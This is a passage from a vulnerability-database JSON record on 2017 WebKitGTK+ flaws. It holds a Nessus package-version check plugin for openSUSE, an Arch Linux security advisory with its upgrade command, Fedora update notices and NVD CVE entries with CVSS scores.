value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/02/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2|SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2 / 42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libjavascriptcoregtk-4_0-18-2.18.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.18.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libwebkit2gtk-4_0-37-2.18.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.18.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libwebkit2gtk3-lang-2.18.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.18.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"typelib-1_0-WebKit2-4_0-2.18.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.18.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"webkit-jsc-4-2.18.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"webkit-jsc-4-debuginfo-2.18.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"webkit2gtk-4_0-injected-bundles-2.18.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.18.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"webkit2gtk3-debugsource-2.18.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"webkit2gtk3-devel-2.18.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"webkit2gtk3-plugin-process-gtk2-2.18.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"webkit2gtk3-plugin-process-gtk2-debuginfo-2.18.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-32bit-2.18.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-32bit-2.18.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-32bit-2.18.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-debuginfo-32bit-2.18.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libjavascriptcoregtk-4_0-18-2.18.0-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.18.0-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libwebkit2gtk-4_0-37-2.18.0-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.18.0-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libwebkit2gtk3-lang-2.18.0-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.18.0-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"typelib-1_0-WebKit2-4_0-2.18.0-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.18.0-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit-jsc-4-2.18.0-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit-jsc-4-debuginfo-2.18.0-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk-4_0-injected-bundles-2.18.0-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.18.0-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-debugsource-2.18.0-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-devel-2.18.0-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-plugin-process-gtk2-2.18.0-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-plugin-process-gtk2-debuginfo-2.18.0-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-32bit-2.18.0-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-32bit-2.18.0-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-32bit-2.18.0-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-debuginfo-32bit-2.18.0-5.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjavascriptcoregtk-4_0-18 / libjavascriptcoregtk-4_0-18-32bit / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "archlinux": [{"lastseen": "2020-09-22T18:36:43", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7018", "CVE-2017-7030", "CVE-2017-7034", "CVE-2017-7037", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7048", "CVE-2017-7055", "CVE-2017-7056", "CVE-2017-7061", "CVE-2017-7064"], "description": "Arch Linux Security Advisory ASA-201707-25\n==========================================\n\nSeverity: Critical\nDate : 2017-07-26\nCVE-ID : CVE-2017-7018 CVE-2017-7030 CVE-2017-7034 CVE-2017-7037\nCVE-2017-7039 CVE-2017-7046 CVE-2017-7048 CVE-2017-7055\nCVE-2017-7056 CVE-2017-7061 CVE-2017-7064\nPackage : webkit2gtk\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-362\n\nSummary\n=======\n\nThe package webkit2gtk before version 2.16.6-1 is vulnerable to\nmultiple issues including arbitrary code execution and information\ndisclosure.\n\nResolution\n==========\n\nUpgrade to 2.16.6-1.\n\n# pacman -Syu \"webkit2gtk>=2.16.6-1\"\n\nThe problems have been fixed upstream in version 2.16.6.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2017-7018 (arbitrary code execution)\n\nSeveral memory corruption issues have been found in WebKitGTK+ <=\n2.16.5, leading to arbitrary code execution when processing maliciously\ncrafted web contents.\n\n- CVE-2017-7030 (arbitrary code execution)\n\nSeveral memory corruption issues have been found in WebKitGTK+ <=\n2.16.5, leading to arbitrary code execution when processing maliciously\ncrafted web contents.\n\n- CVE-2017-7034 (arbitrary code execution)\n\nSeveral memory corruption issues have been found in WebKitGTK+ <=\n2.16.5, leading to arbitrary code execution when processing maliciously\ncrafted web contents.\n\n- CVE-2017-7037 (arbitrary code execution)\n\nSeveral memory corruption issues have been found in WebKitGTK+ <=\n2.16.5, leading to arbitrary code execution when processing maliciously\ncrafted web contents.\n\n- CVE-2017-7039 (arbitrary code execution)\n\nSeveral memory corruption issues have been found in WebKitGTK+ <=\n2.16.5, leading to arbitrary code execution when processing maliciously\ncrafted web contents.\n\n- CVE-2017-7046 (arbitrary code execution)\n\nSeveral memory corruption issues have been found in WebKitGTK+ <=\n2.16.5, leading to arbitrary code execution when processing maliciously\ncrafted web contents.\n\n- CVE-2017-7048 (arbitrary code execution)\n\nSeveral memory corruption issues have been found in WebKitGTK+ <=\n2.16.5, leading to arbitrary code execution when processing maliciously\ncrafted web contents.\n\n- CVE-2017-7055 (arbitrary code execution)\n\nSeveral memory corruption issues have been found in WebKitGTK+ <=\n2.16.5, leading to arbitrary code execution when processing maliciously\ncrafted web contents.\n\n- CVE-2017-7056 (arbitrary code execution)\n\nSeveral memory corruption issues have been found in WebKitGTK+ <=\n2.16.5, leading to arbitrary code execution when processing maliciously\ncrafted web contents.\n\n- CVE-2017-7061 (arbitrary code execution)\n\nSeveral memory corruption issues have been found in WebKitGTK+ <=\n2.16.5, leading to arbitrary code execution when processing maliciously\ncrafted web contents.\n\n- CVE-2017-7064 (information disclosure)\n\nAn information disclosure issue has been found in WebKitGTK+ <= 2.16.5,\nwhere an application may be able to read restricted memory.\n\nImpact\n======\n\nA remote attacker might be able to access sensitive information or\nexecute arbitrary code on the affected host.\n\nReferences\n==========\n\nhttps://webkitgtk.org/security/WSA-2017-0006.html\nhttps://security.archlinux.org/CVE-2017-7018\nhttps://security.archlinux.org/CVE-2017-7030\nhttps://security.archlinux.org/CVE-2017-7034\nhttps://security.archlinux.org/CVE-2017-7037\nhttps://security.archlinux.org/CVE-2017-7039\nhttps://security.archlinux.org/CVE-2017-7046\nhttps://security.archlinux.org/CVE-2017-7048\nhttps://security.archlinux.org/CVE-2017-7055\nhttps://security.archlinux.org/CVE-2017-7056\nhttps://security.archlinux.org/CVE-2017-7061\nhttps://security.archlinux.org/CVE-2017-7064", "modified": "2017-07-26T00:00:00", "published": "2017-07-26T00:00:00", "id": "ASA-201707-25", "href": "https://security.archlinux.org/ASA-201707-25", "type": "archlinux", "title": "[ASA-201707-25] webkit2gtk: multiple issues", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7018", "CVE-2017-7030", "CVE-2017-7034", "CVE-2017-7037", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7048", "CVE-2017-7055", "CVE-2017-7056", "CVE-2017-7061", "CVE-2017-7064"], "description": "WebKitGTK+ is the port of the portable web rendering engine WebKit to the GTK+ platform. This package contains WebKitGTK+ for GTK+ 3. ", "modified": "2017-08-07T20:18:27", "published": "2017-08-07T20:18:27", "id": "FEDORA:417B06017118", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: webkitgtk4-2.16.6-1.fc24", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7018", "CVE-2017-7030", "CVE-2017-7034", "CVE-2017-7037", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7048", "CVE-2017-7055", "CVE-2017-7056", "CVE-2017-7061", "CVE-2017-7064"], "description": "WebKitGTK+ is the port of the portable web rendering engine WebKit to the GTK+ platform. This package contains WebKitGTK+ for GTK+ 3. ", "modified": "2017-07-31T00:22:09", "published": "2017-07-31T00:22:09", "id": "FEDORA:D681D609273A", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: webkitgtk4-2.16.6-1.fc25", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7018", "CVE-2017-7030", "CVE-2017-7034", "CVE-2017-7037", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7048", "CVE-2017-7055", "CVE-2017-7056", "CVE-2017-7061", "CVE-2017-7064"], "description": "WebKitGTK+ is the port of the portable web rendering engine WebKit to the GTK+ platform. This package contains WebKitGTK+ for GTK+ 3. ", "modified": "2017-07-27T16:54:47", "published": "2017-07-27T16:54:47", "id": "FEDORA:33FB9639A184", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: webkitgtk4-2.16.6-1.fc26", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-2538"], "description": "WebKitGTK+ is the port of the portable web rendering engine WebKit to the GTK+ platform. This package contains WebKitGTK+ for GTK+ 3. ", "modified": "2017-07-25T19:48:43", "published": "2017-07-25T19:48:43", "id": "FEDORA:D7806602D551", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: webkitgtk4-2.16.5-1.fc24", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-2538"], "description": "WebKitGTK+ is the port of the portable web rendering engine WebKit to the GTK+ platform. This package contains WebKitGTK+ for GTK+ 3. ", "modified": "2017-07-07T07:21:50", "published": "2017-07-07T07:21:50", "id": "FEDORA:48FE6603253B", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: webkitgtk4-2.16.5-1.fc25", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-2538"], "description": "WebKitGTK+ is the port of the portable web rendering engine WebKit to the GTK+ platform. This package contains WebKitGTK+ for GTK+ 3. ", "modified": "2017-06-23T14:22:20", "published": "2017-06-23T14:22:20", "id": "FEDORA:0A5F9606D22A", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: webkitgtk4-2.16.4-1.fc26", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2021-02-02T06:36:49", "description": "An issue was discovered in certain Apple products. iOS before 10.3.3 is affected. Safari before 10.1.2 is affected. iCloud before 6.2.2 on Windows is affected. iTunes before 12.6.2 on Windows is affected. tvOS before 10.2.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "edition": 13, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-20T16:29:00", "title": "CVE-2017-7037", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7037"], "modified": "2019-03-22T19:25:00", "cpe": ["cpe:/a:apple:webkit:-"], "id": "CVE-2017-7037", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7037", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apple:webkit:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:49", "description": "An issue was discovered in certain Apple products. iOS before 10.3.3 is affected. Safari before 10.1.2 is affected. iCloud before 6.2.2 on Windows is affected. iTunes before 12.6.2 on Windows is affected. tvOS before 10.2.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "edition": 13, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-20T16:29:00", "title": "CVE-2017-7034", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7034"], "modified": "2019-03-22T19:24:00", "cpe": ["cpe:/a:apple:webkit:-"], "id": "CVE-2017-7034", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7034", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apple:webkit:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:49", "description": "An issue was discovered in certain Apple products. iOS before 10.3.3 is affected. Safari before 10.1.2 is affected. iCloud before 6.2.2 on Windows is affected. iTunes before 12.6.2 on Windows is affected. tvOS before 10.2.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "edition": 13, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-20T16:29:00", "title": "CVE-2017-7030", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7030"], "modified": "2019-03-22T19:24:00", "cpe": ["cpe:/a:apple:webkit:-"], "id": "CVE-2017-7030", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7030", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apple:webkit:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:49", "description": "An issue was discovered in certain Apple products. iOS before 10.3.3 is affected. Safari before 10.1.2 is affected. iCloud before 6.2.2 on Windows is affected. iTunes before 12.6.2 on Windows is affected. tvOS before 10.2.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "edition": 13, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-20T16:29:00", "title": "CVE-2017-7018", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7018"], "modified": "2019-03-22T19:22:00", "cpe": ["cpe:/a:apple:webkit:-"], "id": "CVE-2017-7018", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7018", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apple:webkit:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:49", "description": "An issue was discovered in certain Apple products. iOS before 10.3.3 is affected. Safari before 10.1.2 is affected. iCloud before 6.2.2 on Windows is affected. iTunes before 12.6.2 on Windows is affected. tvOS before 10.2.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "edition": 13, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-20T16:29:00", "title": "CVE-2017-7046", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7046"], "modified": "2019-03-22T19:27:00", "cpe": ["cpe:/a:apple:webkit:-"], "id": "CVE-2017-7046", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7046", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apple:webkit:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:49", "description": "An issue was discovered in certain Apple products. iOS before 10.3.3 is affected. Safari before 10.1.2 is affected. iCloud before 6.2.2 on Windows is affected. iTunes before 12.6.2 on Windows is affected. tvOS before 10.2.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "edition": 13, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-20T16:29:00", "title": "CVE-2017-7048", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7048"], "modified": "2019-03-22T19:28:00", "cpe": ["cpe:/a:apple:webkit:-"], "id": "CVE-2017-7048", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7048", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apple:webkit:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:49", "description": "An issue was discovered in certain Apple products. iOS 